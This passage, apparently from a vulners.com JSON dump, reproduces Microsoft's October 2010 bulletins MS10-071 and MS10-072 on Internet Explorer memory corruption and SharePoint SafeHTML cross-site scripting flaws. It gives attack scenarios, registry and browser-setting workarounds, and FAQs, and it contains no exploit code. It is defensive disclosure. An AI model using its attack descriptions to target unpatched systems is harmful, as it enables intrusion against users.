through e-mail. For an attack to be successful, a user must open an attachment that is sent in an e-mail message.\r\n\u2022\t\r\n\r\nAn attacker who successfully exploited this vulnerability could gain the same user rights as the local user. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\r\n\u2022\t\r\n\r\nIn a Web-based attack scenario, an attacker could host a Web site that contains a Web page that is used to exploit this vulnerability. In addition, compromised Web sites and Web sites that accept or host user-provided content or advertisements could contain specially crafted content that could exploit this vulnerability. In all cases, however, an attacker would have no way to force users to visit these Web sites. Instead, an attacker would have to convince users to visit the Web site, typically by getting them to click a link in an e-mail message or Instant Messenger message that takes users to the attacker's Web site.\r\nTop of sectionTop of section\r\n\t\r\nWorkarounds for Uninitialized Memory Corruption Vulnerability - CVE-2010-3331\r\n\r\nWorkaround refers to a setting or configuration change that does not correct the underlying vulnerability but would help block known attack vectors before you apply the update. Microsoft has tested the following workarounds and states in the discussion whether a workaround reduces functionality:\r\n\u2022\t\r\n\r\nUse Microsoft Office File Block policy to block the opening of HTML documents from unknown or untrusted sources and locations\r\n\r\nThe following registry scripts can be used to set the File Block policy.\r\n\r\nNote Modifying the Registry incorrectly can cause serious problems that may require you to reinstall your operating system. Microsoft cannot guarantee that problems resulting from incorrect modification of the Registry can be solved. Modify the Registry at your own risk.\r\n\r\nFor Office 2003 \r\n\r\nWindows Registry Editor Version 5.00\r\n\r\n[HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Word\Security\FileOpenBlock]\r\n\r\n"HtmlFiles"=dword:00000001\r\n\r\nNote In order to use 'FileOpenBlock' with Microsoft Office 2003, all of the latest security updates for Microsoft Office 2003 must be applied.\r\n\r\nFor 2007 Office system \r\n\r\nWindows Registry Editor Version 5.00\r\n\r\n[HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\12.0\Word\Security\FileOpenBlock]\r\n\r\n"HtmlFiles"=dword:00000001\r\n\r\nNote In order to use 'FileOpenBlock' with the 2007 Microsoft Office system, all of the latest security updates for the 2007 Microsoft Office system must be applied.\r\n\r\nImpact of workaround. Users who have configured the File Block policy and have not configured a special "exempt directory" as discussed in Microsoft Knowledge Base Article 922848 will be unable to open Office 2003 files or earlier versions in Office 2003 or 2007 Microsoft Office System.\r\n\r\nHow to undo the workaround.\r\n\r\nFor Office 2003\r\n\r\nWindows Registry Editor Version 5.00\r\n\r\n[HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Word\Security\FileOpenBlock]\r\n\r\n"HtmlFiles"=dword:00000000\r\n\r\nFor 2007 Office system\r\n\r\nWindows Registry Editor Version 5.00\r\n\r\n[HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\12.0\Word\Security\FileOpenBlock]\r\n\r\n"HtmlFiles"=dword:00000000\r\nTop of sectionTop of section\r\n\t\r\nFAQ for Uninitialized Memory Corruption Vulnerability - CVE-2010-3331\r\n\r\nWhat is the scope of the vulnerability? \r\nThis is a remote code execution vulnerability. An attacker who successfully exploited this vulnerability could gain the same user rights as the logged-on user. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\r\n\r\nWhat causes the vulnerability? \r\nWhen Internet Explorer attempts to access an object that has not been initialized or has been deleted, it may corrupt memory in such a way that an attacker could execute arbitrary code in the context of the logged-on user.\r\n\r\nWhat might an attacker use the vulnerability to do? \r\nAn attacker who successfully exploited this vulnerability could gain the same user rights as a logged-on user. If the user is logged on with administrative user rights, an attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\r\n\r\nHow could an attacker exploit the vulnerability? \r\nAn attacker can send a user a specially crafted Word document that is designed to exploit this vulnerability through Microsoft Word and convince the user to view the Word document. In all cases, however, an attacker would have no way to force users to view the attacker-controlled content. Instead, an attacker would have to convince users to take action, typically by clicking a link in an e-mail message or in an Instant Messenger message that takes users to the attacker's Web site, or by opening an attachment sent through e-mail. This issue cannot be exploited directly through Internet Explorer.\r\n\r\nWhat systems are primarily at risk from the vulnerability? \r\nThis vulnerability requires that a user be logged on and opening a malicious Word document for an attack to occur. Therefore, any systems where Microsoft Word is used frequently, such as workstations or terminal servers, are at the most risk from this vulnerability.\r\n\r\nWhat does the update do? \r\nThe update addresses the vulnerability by modifying the way that Internet Explorer handles objects in memory.\r\n\r\nWhen this security bulletin was issued, had this vulnerability been publicly disclosed? \r\nNo. Microsoft received information about this vulnerability through coordinated vulnerability disclosure.\r\n\r\nWhen this security bulletin was issued, had Microsoft received any reports that this vulnerability was being exploited? \r\nNo. Microsoft had not received any information to indicate that this vulnerability had been publicly used to attack customers when this security bulletin was originally issued.\r\n\r\nOther Information\r\nAcknowledgments\r\n\r\nMicrosoft thanks the following for working with us to help protect customers:\r\n\u2022\t\r\n\r\nSirdarckcat of Google Inc. for reporting the HTML Sanitization Vulnerability (CVE-2010-3243)\r\n\u2022\t\r\n\r\nMario Heiderich for reporting the HTML Sanitization Vulnerability (CVE-2010-3324)\r\n\u2022\t\r\n\r\nTakehiro Takahashi of IBM ISS X-Force for reporting the Uninitialized Memory Corruption Vulnerability (CVE-2010-3326)\r\n\u2022\t\r\n\r\nPeter Vreugdenhil, working with TippingPoint's Zero Day Initiative, for reporting the Uninitialized Memory Corruption Vulnerability (CVE-2010-3328)\r\n\u2022\t\r\n\r\nDamián Frizza of Core Security Technologies for reporting the Uninitialized Memory Corruption Vulnerability (CVE-2010-3329)\r\n\u2022\t\r\n\r\nAldwin Saugere and Radoslav Vasilev of Cigital for reporting the Cross-Domain Information Disclosure Vulnerability (CVE-2010-3330)\r\n\u2022\t\r\n\r\nRodrigo Rubira Branco of Check Point IPS Research Center for reporting the Uninitialized Memory Corruption Vulnerability (CVE-2010-3331)\r\nTop of sectionTop of section\r\nMicrosoft Active Protections Program (MAPP)\r\n\r\nTo improve security protections for customers, Microsoft provides vulnerability information to major security software providers in advance of each monthly security update release. Security software providers can then use this vulnerability information to provide updated protections to customers via their security software or devices, such as antivirus, network-based intrusion detection systems, or host-based intrusion prevention systems. To determine whether active protections are available from security software providers, please visit the active protections Web sites provided by program partners, listed in Microsoft Active Protections Program (MAPP) Partners.\r\n\r\nSupport\r\n\u2022\t\r\n\r\nCustomers in the U.S. and Canada can receive technical support from Security Support or 1-866-PCSAFETY. There is no charge for support calls that are associated with security updates. For more information about available support options, see Microsoft Help and Support.\r\n\u2022\t\r\n\r\nInternational customers can receive support from their local Microsoft subsidiaries. There is no charge for support that is associated with security updates. For more information about how to contact Microsoft for support issues, visit the International Support Web site.\r\n\r\nDisclaimer\r\n\r\nThe information provided in the Microsoft Knowledge Base is provided "as is" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.\r\n\r\nRevisions\r\n\u2022\t\r\n\r\nV1.0 (October 12, 2010): Bulletin published.", "cvss3": {}, "published": "2010-10-13T00:00:00", "type": "securityvulns", "title": "Microsoft Security Bulletin MS10-071 - Critical Cumulative Security Update for Internet Explorer (2360131)", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2010-3331", "CVE-2010-0808", "CVE-2010-3330", "CVE-2010-3328", "CVE-2010-3324", "CVE-2010-3325", "CVE-2010-3243", "CVE-2010-4243", "CVE-2010-3326", "CVE-2010-3329", "CVE-2010-3327"], "modified": "2010-10-13T00:00:00", "id": "SECURITYVULNS:DOC:24871", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:24871", "sourceData": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T19:16:44", "description": "Few crossite scripting possibilities.", "cvss3": {}, "published": "2010-10-13T00:00:00", "type": "securityvulns", "title": "Microsoft Sharepoint SafeHTML crossite scripting", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2010-3324", "CVE-2010-3243"], "modified": "2010-10-13T00:00:00", "id": "SECURITYVULNS:VULN:11190", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:11190", "sourceData": "", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:37", "description": "Microsoft Security Bulletin MS10-072 - Important\r\nVulnerabilities in SafeHTML Could Allow Information Disclosure (2412048)\r\nPublished: October 12, 2010\r\n\r\nVersion: 1.0\r\nGeneral Information\r\nExecutive Summary\r\n\r\nThis security update resolves one publicly disclosed vulnerability and one privately reported vulnerability in Microsoft SharePoint and Windows SharePoint Services. The vulnerabilities could allow information disclosure if an attacker submits specially crafted script to a target site using SafeHTML.\r\n\r\nThis security update is rated Important for Microsoft SharePoint Services 3.0, Microsoft SharePoint Foundation 2010, and Microsoft Office Web Apps; and all supported editions of Microsoft Office SharePoint Server 2007, and Microsoft Groove Server 2010. For more information, see the subsection, Affected and Non-Affected Software, in this section.\r\n\r\nThe update addresses the vulnerabilities by modifying the way that SafeHTML sanitizes HTML content. For more information about the vulnerability, see the Frequently Asked Questions (FAQ) subsection for the specific vulnerability entry under the next section, Vulnerability Information.\r\n\r\nRecommendation. Microsoft recommends that customers apply the update at the earliest opportunity.\r\n\r\nKnown Issues. None\r\nTop of sectionTop of section\r\nAffected and Non-Affected Software\r\n\r\nThe following software have been tested to determine which versions or editions are affected. Other versions or editions are either past their support life cycle or are not affected. To determine the support life cycle for your software version or edition, visit Microsoft Support Lifecycle.\r\n\r\nAffected Software \r\nSoftware\tMaximum Security Impact\tAggregate Severity Rating\tBulletins Replaced by this Update\r\nWindows SharePoint Services and Microsoft SharePoint Foundation\t \t \t \r\n\r\nMicrosoft Windows SharePoint Services 3.0 Service Pack 2 (32-bit versions)\r\n(KB2345304)\r\n\t\r\n\r\nInformation Disclosure\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nMS10-039\r\n\r\nMicrosoft Windows SharePoint Services 3.0 Service Pack 2 (64-bit versions)\r\n(KB2345304)\r\n\t\r\n\r\nInformation Disclosure\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nMS10-039\r\n\r\nMicrosoft SharePoint Foundation 2010\r\n(KB2345322)\r\n\t\r\n\r\nInformation Disclosure\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nNone\r\nMicrosoft SharePoint Server and Microsoft Groove Server\t \t \t \r\n\r\nMicrosoft Office SharePoint Server 2007 Service Pack 2 (32-bit editions)[1]\r\n(KB2345212)\r\n\t\r\n\r\nInformation Disclosure\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nMS10-039\r\n\r\nMicrosoft Office SharePoint Server 2007 Service Pack 2 (64-bit editions)[1]\r\n(KB2345212)\r\n\t\r\n\r\nInformation Disclosure\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nMS10-039\r\n\r\nMicrosoft Groove Server 2010\r\n(KB2346298)\r\n\t\r\n\r\nInformation Disclosure\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nNone\r\nMicrosoft Office Web Apps\t \t \t \r\n\r\nMicrosoft Office Web Apps\r\n(KB2346411)\r\n\t\r\n\r\nInformation Disclosure\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nNone\r\n\r\n[1]For supported editions of Microsoft Office SharePoint Server 2007, in addition to security update package KB2345212, customers also need to install the security update for Microsoft Windows SharePoint Services 3.0 (KB2345304) to be protected from the vulnerabilities described in this bulletin.\r\n\r\nNon-Affected Software \r\nOffice and Other Software\r\n\r\nMicrosoft Windows SharePoint Services 2.0\r\n\r\nMicrosoft SharePoint Portal Server 2001 Service Pack 3\r\n\r\nMicrosoft SharePoint Portal Server 2003 Service Pack 3\r\n\r\nMicrosoft SharePoint Server 2010\r\n\r\nMicrosoft Groove 2007\r\n\r\nMicrosoft SharePoint Workspace\r\nTop of sectionTop of section\r\n\t\r\nFrequently Asked Questions (FAQ) Related to This Security Update\r\n\r\nWhere are the file information details? \r\nRefer to the reference tables in the Security Update Deployment section for the location of the file information details.\r\n\r\nHow is this security update related to MS10-071? \r\nThe HTML Sanitization Vulnerability (CVE-2010-3243) and HTML Sanitization Vulnerability (CVE-2010-3324) are addressed by this update (MS10-072) and the Cumulative Security Update for Internet Explorer (MS10-071) update.\r\n\r\nTwo different updates are needed because the modifications that are required to address the issue are located in different Microsoft products. This update (MS10-072) addresses the vulnerabilities in affected Microsoft productivity software and MS10-071 addresses the vulnerabilities in Internet Explorer.\r\n\r\nMS10-079 also describes vulnerabilities in Microsoft Office Web Apps. How does MS10-079 relate to this bulletin (MS10-072)? \r\nThe security update package in this bulletin, MS10-072, for Microsoft Office Web Apps (KB2346411) also addresses a vulnerability described in MS10-079. Users with Microsoft Office Web Apps installed will only need to install the KB2346411 security update package once.\r\n\r\nWhy does this update address several reported security vulnerabilities? \r\nThis update contains support for several vulnerabilities because the modifications that are required to address these issues are located in related files. Instead of having to install several updates that are almost the same, customers need to install this update only.\r\n\r\nWhat is Microsoft Groove Server 2010? \r\nMicrosoft Groove Server 2010 is a Windows-based software package that provides comprehensive services for managing Microsoft SharePoint Workspace. Groove Server 2010 contains two components: Groove Server 2010 Manager and Groove Server 2010 Relay, each of which runs on a Windows server on an enterprise network.\r\n\r\nWhat is Microsoft Office Web Apps? \r\nMicrosoft Office Web Apps is the online companion to Office Word, Excel, PowerPoint, and OneNote applications that enables users regardless of their location to access documents and edit documents. Users can view, share, and work on documents with others online across personal computers, mobile phones, and the Web. Office Web Apps is available to business customers with Microsoft Office 2010 volume licensing and document management solutions based on Microsoft SharePoint 2010 products.\r\n\r\nWhere are updates for Microsoft Office Web Apps applied? \r\nCustomers who have deployed Microsoft Office Web Apps in a SharePoint environment will need to apply the updates for Microsoft Office Web Apps on the servers on which those components are installed. For more information about deploying Microsoft Web Apps, see the Microsoft TechNet article, Understanding Office Web Apps.\r\n\r\nNote The update for Microsoft Office Web Apps does not apply to the client workstations that use a Web browser to access Microsoft Office Web Apps.\r\n\r\nWhat is Microsoft SharePoint Foundation 2010? \r\nSharePoint Foundation 2010 is the new version of Microsoft Windows SharePoint Services. It is the essential solution for organizations that need a secure, manageable, web-based collaboration platform. SharePoint helps teams stay connected and productive by providing easy access to the people, documents, and information that they need to make well-informed decisions and get work done. Use SharePoint Foundation to coordinate schedules, organize documents, and participate in discussions through team workspaces, blogs, wikis, and document libraries on the platform that is the underlying infrastructure for SharePoint Server.\r\n\r\nWhat is Microsoft Windows SharePoint Services 3.0? \r\nWindows SharePoint Services 3.0 provides a platform for collaborative applications, offering a common framework for document management and a common repository for storing documents of all types. It exposes key Windows Server services like Windows Workflow Services and Windows Rights Management Services.\r\n\r\nWindows SharePoint Services 3.0 is provided as a free download for supported editions of Windows Server 2003 and Windows Server 2008.\r\n\r\nHow is Microsoft Windows SharePoint Services 3.0 related to Microsoft Office SharePoint Server 2007? \r\nMicrosoft Office SharePoint Server 2007 is an integrated suite of server capabilities built on top of Windows SharePoint Services 3.0.\r\n\r\nIn what configurations will I need to apply the different updates? \r\nYou will need to apply one or both updates, depending on which SharePoint product is installed on your system. For systems with only Microsoft Windows SharePoint Services 3.0 installed, you will need to apply the KB2345304 update. For systems with Microsoft Office SharePoint Server 2007 installed, you will need to apply both the KB2345212 and KB2345304 updates. There is no configuration where you can only have Microsoft Office SharePoint Server 2007 and not Microsoft Windows SharePoint Services 3.0.\r\n\r\nI am using an older release of the software discussed in this security bulletin. What should I do? \r\nThe affected software listed in this bulletin have been tested to determine which releases are affected. Other releases are past their support life cycle. For more information about the product lifecycle, visit the Microsoft Support Lifecycle Web site.\r\n\r\nIt should be a priority for customers who have older releases of the software to migrate to supported releases to prevent potential exposure to vulnerabilities. To determine the support lifecycle for your software release, see Select a Product for Lifecycle Information. For more information about service packs for these software releases, see Lifecycle Supported Service Packs.\r\n\r\nCustomers who require custom support for older software must contact their Microsoft account team representative, their Technical Account Manager, or the appropriate Microsoft partner representative for custom support options. Customers without an Alliance, Premier, or Authorized Contract can contact their local Microsoft sales office. For contact information, visit the Microsoft Worldwide Information Web site, select the country in the Contact Information list, and then click Go to see a list of telephone numbers. When you call, ask to speak with the local Premier Support sales manager. For more information, see the Microsoft Support Lifecycle Policy FAQ.\r\nTop of sectionTop of section\r\nVulnerability Information\r\n\t\r\nSeverity Ratings and Vulnerability Identifiers\r\n\r\nThe following severity ratings assume the potential maximum impact of the vulnerability. For information regarding the likelihood, within 30 days of this security bulletin's release, of the exploitability of the vulnerability in relation to its severity rating and security impact, please see the Exploitability Index in the October bulletin summary. For more information, see Microsoft Exploitability Index.\r\nVulnerability Severity Rating and Maximum Security Impact by Affected Software\r\nAffected Software\tHTML Sanitization Vulnerability - CVE-2010-3243 \tHTML Sanitization Vulnerability - CVE-2010-3324\tAggregate Severity Rating\r\nWindows SharePoint Services and Microsoft SharePoint Foundation\t \t \t \r\n\r\nMicrosoft Windows SharePoint Services 3.0 Service Pack 2 (32-bit versions)\r\n\t\r\n\r\nImportant \r\nInformation Disclosure\r\n\t\r\n\r\nImportant \r\nInformation Disclosure\r\n\t\r\n\r\nImportant\r\n\r\nMicrosoft Windows SharePoint Services 3.0 Service Pack 2 (64-bit versions)\r\n\t\r\n\r\nImportant \r\nInformation Disclosure\r\n\t\r\n\r\nImportant \r\nInformation Disclosure\r\n\t\r\n\r\nImportant\r\n\r\nMicrosoft SharePoint Foundation 2010\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nImportant \r\nInformation Disclosure\r\n\t\r\n\r\nImportant\r\nMicrosoft SharePoint Server and Microsoft Groove Server\t \t \t \r\n\r\nMicrosoft Office SharePoint Server 2007 Service Pack 2 (32-bit editions)\r\n\t\r\n\r\nImportant \r\nInformation Disclosure\r\n\t\r\n\r\nImportant \r\nInformation Disclosure\r\n\t\r\n\r\nImportant\r\n\r\nMicrosoft Office SharePoint Server 2007 Service Pack 2 (64-bit editions)\r\n\t\r\n\r\nImportant \r\nInformation Disclosure\r\n\t\r\n\r\nImportant \r\nInformation Disclosure\r\n\t\r\n\r\nImportant\r\n\r\nMicrosoft Groove Server 2010\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nImportant \r\nInformation Disclosure\r\n\t\r\n\r\nImportant\r\nMicrosoft Office Web Apps\t \t \t \r\n\r\nMicrosoft Office Web Apps\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nImportant \r\nInformation Disclosure\r\n\t\r\n\r\nImportant\r\nTop of sectionTop of section\r\n\t\r\nHTML Sanitization Vulnerability - CVE-2010-3243\r\n\r\nAn information disclosure vulnerability exists in the way that HTML is filtered that could allow an attacker to perform cross-site scripting attacks and run script in the security context of the logged-on user.\r\n\r\nTo view this vulnerability as a standard entry in the Common Vulnerabilities and Exposures list, see CVE-2010-3243.\r\n\t\r\nMitigating Factors for HTML Sanitization Vulnerability - CVE-2010-3243\r\n\r\nMitigation refers to a setting, common configuration, or general best-practice, existing in a default state, that could reduce the severity of exploitation of a vulnerability. The following mitigating factors may be helpful in your situation:\r\n\u2022\t\r\n\r\nOnly sites that use SafeHTML to sanitize HTML are affected.\r\nTop of sectionTop of section\r\n\t\r\nWorkarounds for HTML Sanitization Vulnerability - CVE-2010-3243\r\n\r\nMicrosoft has not identified any workarounds for this vulnerability.\r\nTop of sectionTop of section\r\n\t\r\nFAQ for HTML Sanitization Vulnerability - CVE-2010-3243\r\n\r\nWhat is the scope of the vulnerability? \r\nThis is an information disclosure vulnerability. An attacker who successfully exploited the vulnerability could perform persistent cross-site scripting attacks against users of a site that is filtering HTML content via SafeHTML.\r\n\r\nWhat causes the vulnerability? \r\nThe vulnerability is caused by the way that the SafeHTML function sanitizes HTML.\r\n\r\nWhat is cross-site scripting? \r\nCross-site scripting (XSS) is a class of security vulnerability that can enable an attacker to inject script code into a user's session with a Web site. The vulnerability can affect Web servers that dynamically generate HTML pages. If these servers embed browser input in the dynamic pages that they send back to the browser, these servers can be manipulated to include maliciously supplied content in the dynamic pages. This can allow malicious script to be executed. Web browsers may perpetuate this problem through their assumptions of "trusted" sites and their use of cookies to maintain persistent state with the Web sites that they frequent. An XSS attack does not modify Web site content. Instead, it inserts new, malicious script that can execute at the browser in the context that is associated with a trusted server.\r\n\r\nWhat might an attacker use the vulnerability to do? \r\nAn attacker who successfully exploited the vulnerability could perform cross-site scripting attacks against users of a targeted site that uses SafeHTML to sanitize HTML. An attacker could then potentially run scripts on behalf of the targeted site's users.\r\n\r\nHow could an attacker exploit the vulnerability? \r\nTo exploit this vulnerability, an attacker must have the ability to submit a specially crafted script to a target site using SafeHTML. Due to the vulnerability, in specific situations the specially crafted script is not properly sanitized, which subsequently could lead to an attacker-supplied script being run in the security context of a user who views the malicious content.\r\n\r\nFor cross-site scripting attacks, this vulnerability requires that a user be visiting a compromised site for any malicious action to occur. For instance, after an attacker has successfully submitted specially crafted script to the targeted site using SafeHTML, any Web page on that site that contains the specially crafted script is a potential vector for persistent cross-site scripting attacks. When a user visits a Web page that contains the specially crafted script, the script could be run in the security context of the user.\r\n\r\nWhat systems are primarily at risk from the vulnerability? \r\nSystems where users connect to a server that uses SafeHTML to sanitize HTML content, such as workstations or terminal servers, are primarily at risk.\r\n\r\nWhat does the update do? \r\nThe update addresses the vulnerability by modifying the way that SafeHTML sanitizes HTML content.\r\n\r\nWhen this security bulletin was issued, had this vulnerability been publicly disclosed? \r\nNo. Microsoft received information about this vulnerability through coordinated vulnerability disclosure.\r\n\r\nWhen this security bulletin was issued, had Microsoft received any reports that this vulnerability was being exploited? \r\nNo. Microsoft had not received any information to indicate that this vulnerability had been publicly used to attack customers when this security bulletin was originally issued.\r\nTop of sectionTop of section\r\nTop of sectionTop of section\r\n\t\r\nHTML Sanitization Vulnerability - CVE-2010-3324\r\n\r\nAn information disclosure vulnerability exists in the way that the SafeHTML function sanitizes HTML. An attacker who successfully exploited this vulnerability could perform cross-site scripting attacks and run script in the security context of the logged-on user.\r\n\r\nTo view this vulnerability as a standard entry in the Common Vulnerabilities and Exposures list, see CVE-2010-3324.\r\n\t\r\nMitigating Factors for HTML Sanitization Vulnerability - CVE-2010-3324\r\n\r\nMicrosoft has not identified any mitigating factors for this vulnerability.\r\nTop of sectionTop of section\r\n\t\r\nWorkarounds for HTML Sanitization Vulnerability - CVE-2010-3324\r\n\r\nWorkaround refers to a setting or configuration change that does not correct the underlying vulnerability but would help block known attack vectors before you apply the update. Microsoft has tested the following workarounds and states in the discussion whether a workaround reduces functionality:\r\n\u2022\t\r\n\r\nRead e-mails in plain text\r\n\r\nTo help protect yourself from the e-mail attack vector, read e-mail messages in plain text format.\r\n\r\nMicrosoft Office Outlook 2002 users who have applied Office XP Service Pack 1 or a later version and Microsoft Office Outlook Express 6 users who have applied Internet Explorer 6 Service Pack 1 or a later version can enable this setting and view e-mail messages that are not digitally signed or e-mail messages that are not encrypted in plain text only.\r\n\r\nDigitally signed e-mail messages or encrypted e-mail messages are not affected by the setting and may be read in their original formats. For more information about how to enable this setting in Outlook 2002, see Microsoft Knowledge Base Article 307594.\r\n\r\nFor information about this setting in Outlook Express 6, see Microsoft Knowledge Base Article 291387.\r\n\r\nImpact of workaround. E-mail messages that are viewed in plain text format will not contain pictures, specialized fonts, animations, or other rich content. Additionally:\r\n\u2022\t\r\n\r\nThe changes are applied to the preview pane and to open messages.\r\n\u2022\t\r\n\r\nPictures become attachments so that they are not lost.\r\n\u2022\t\r\n\r\nBecause the message is still in Rich Text or HTML format in the store, the object model (custom code solutions) may behave unexpectedly.\r\n\u2022\t\r\n\r\nSet Internet and Local intranet security zone settings to "High" to block ActiveX Controls and Active Scripting in these zones\r\n\r\nYou can help protect against exploitation of this vulnerability by changing your settings for the Internet security zone to block ActiveX controls and Active Scripting. You can do this by setting your browser security to High.\r\n\r\nTo raise the browsing security level in Internet Explorer, follow these steps:\r\n\r\n1.\r\n\t\r\n\r\nOn the Internet Explorer Tools menu, click Internet Options.\r\n\r\n2.\r\n\t\r\n\r\nIn the Internet Options dialog box, click the Security tab, and then click the Internet icon.\r\n\r\n3.\r\n\t\r\n\r\nUnder Security level for this zone, move the slider to High. This sets the security level for all Web sites you visit to High.\r\n\r\nNote If no slider is visible, click Default Level, and then move the slider to High.\r\n\r\nNote Setting the level to High may cause some Web sites to work incorrectly. If you have difficulty using a Web site after you change this setting, and you are sure the site is safe to use, you can add that site to your list of trusted sites. This will allow the site to work correctly even with the security setting set to High.\r\n\r\nImpact of workaround. There are side effects to blocking ActiveX Controls and Active Scripting. Many Web sites that are on the Internet or on an intranet use ActiveX or Active Scripting to provide additional functionality. For example, an online e-commerce site or banking site may use ActiveX Controls to provide menus, ordering forms, or even account statements. Blocking ActiveX Controls or Active Scripting is a global setting that affects all Internet and intranet sites. If you do not want to block ActiveX Controls or Active Scripting for such sites, use the steps outlined in "Add sites that you trust to the Internet Explorer Trusted sites zone".\r\n\r\nAdd sites that you trust to the Internet Explorer Trusted sites zone\r\n\r\nAfter you set Internet Explorer to block ActiveX controls and Active Scripting in the Internet zone and in the Local intranet zone, you can add sites that you trust to the Internet Explorer Trusted sites zone. This will allow you to continue to use trusted Web sites exactly as you do today, while helping to protect yourself from this attack on untrusted sites. We recommend that you add only sites that you trust to the Trusted sites zone.\r\n\r\nTo do this, follow these steps:\r\n\r\n1.\r\n\t\r\n\r\nIn Internet Explorer, click Tools, click Internet Options, and then click the Security tab.\r\n\r\n2.\r\n\t\r\n\r\nIn the Select a Web content zone to specify its current security settings box, click Trusted Sites, and then click Sites.\r\n\r\n3.\r\n\t\r\n\r\nIf you want to add sites that do not require an encrypted channel, click to clear the Require server verification (https:) for all sites in this zone check box.\r\n\r\n4.\r\n\t\r\n\r\nIn the Add this Web site to the zone box, type the URL of a site that you trust, and then click Add.\r\n\r\n5.\r\n\t\r\n\r\nRepeat these steps for each site that you want to add to the zone.\r\n\r\n6.\r\n\t\r\n\r\nClick OK two times to accept the changes and return to Internet Explorer.\r\n\r\nNote Add any sites that you trust not to take malicious action on your system. Two in particular that you may want to add are *.windowsupdate.microsoft.com and *.update.microsoft.com. These are the sites that will host the update, and it requires an ActiveX Control to install the update.\r\n\u2022\t\r\n\r\nConfigure Internet Explorer to prompt before running Active Scripting or to disable Active Scripting in the Internet and Local intranet security zone\r\n\r\nYou can help protect against exploitation of this vulnerability by changing your settings to prompt before running Active Scripting or to disable Active Scripting in the Internet and Local intranet security zone. To do this, follow these steps:\r\n\r\n1.\r\n\t\r\n\r\nIn Internet Explorer, click Internet Options on the Tools menu.\r\n\r\n2.\r\n\t\r\n\r\nClick the Security tab.\r\n\r\n3.\r\n\t\r\n\r\nClick Internet, and then click Custom Level.\r\n\r\n4.\r\n\t\r\n\r\nUnder Settings, in the Scripting section, under Active Scripting, click Prompt or Disable, and then click OK.\r\n\r\n5.\r\n\t\r\n\r\nClick Local intranet, and then click Custom Level.\r\n\r\n6.\r\n\t\r\n\r\nUnder Settings, in the Scripting section, under Active Scripting, click Prompt or Disable, and then click OK.\r\n\r\n7.\r\n\t\r\n\r\nClick OK two times to return to Internet Explorer.\r\n\r\nNote Disabling Active Scripting in the Internet and Local intranet security zones may cause some Web sites to work incorrectly. If you have difficulty using a Web site after you change this setting, and you are sure the site is safe to use, you can add that site to your list of trusted sites. This will allow the site to work correctly.\r\n\r\nImpact of workaround. There are side effects to prompting before running Active Scripting. Many Web sites that are on the Internet or on an intranet use Active Scripting to provide additional functionality. For example, an online e-commerce site or banking site may use Active Scripting to provide menus, ordering forms, or even account statements. Prompting before running Active Scripting is a global setting that affects all Internet and intranet sites. You will be prompted frequently when you enable this workaround. For each prompt, if you feel you trust the site that you are visiting, click Yes to run Active Scripting. If you do not want to be prompted for all these sites, use the steps outlined in "Add sites that you trust to the Internet Explorer Trusted sites zone".\r\n\r\nAdd sites that you trust to the Internet Explorer Trusted sites zone\r\n\r\nAfter you set Internet Explorer to require a prompt before it runs ActiveX controls and Active Scripting in the Internet zone and in the Local intranet zone, you can add sites that you trust to the Internet Explorer Trusted sites zone. This will allow you to continue to use trusted Web sites exactly as you do today, while helping to protect you from this attack on untrusted sites. We recommend that you add only sites that you trust to the Trusted sites zone.\r\n\r\nTo do this, follow these steps:\r\n\r\n1.\r\n\t\r\n\r\nIn Internet Explorer, click Tools, click Internet Options, and then click the Security tab.\r\n\r\n2.\r\n\t\r\n\r\nIn the Select a Web content zone to specify its current security settings box, click Trusted Sites, and then click Sites.\r\n\r\n3.\r\n\t\r\n\r\nIf you want to add sites that do not require an encrypted channel, click to clear the Require server verification (https:) for all sites in this zone check box.\r\n\r\n4.\r\n\t\r\n\r\nIn the Add this Web site to the zone box, type the URL of a site that you trust, and then click Add.\r\n\r\n5.\r\n\t\r\n\r\nRepeat these steps for each site that you want to add to the zone.\r\n\r\n6.\r\n\t\r\n\r\nClick OK two times to accept the changes and return to Internet Explorer.\r\n\r\nNote Add any sites that you trust not to take malicious action on your system. Two in particular that you may want to add are *.windowsupdate.microsoft.com and *.update.microsoft.com. These are the sites that will host the update, and it requires an ActiveX Control to install the update.\r\nTop of sectionTop of section\r\n\t\r\nFAQ for HTML Sanitization Vulnerability - CVE-2010-3324\r\n\r\nWhat is the scope of the vulnerability? \r\nThis is an information disclosure vulnerability. An attacker who successfully exploited the vulnerability could perform persistent cross-site scripting attacks against users of a site that is filtering HTML content via SafeHTML.\r\n\r\nWhat causes the vulnerability? \r\nThe vulnerability is caused by the way that the SafeHTML function sanitizes HTML.\r\n\r\nWhat is cross-site scripting? \r\nCross-site scripting 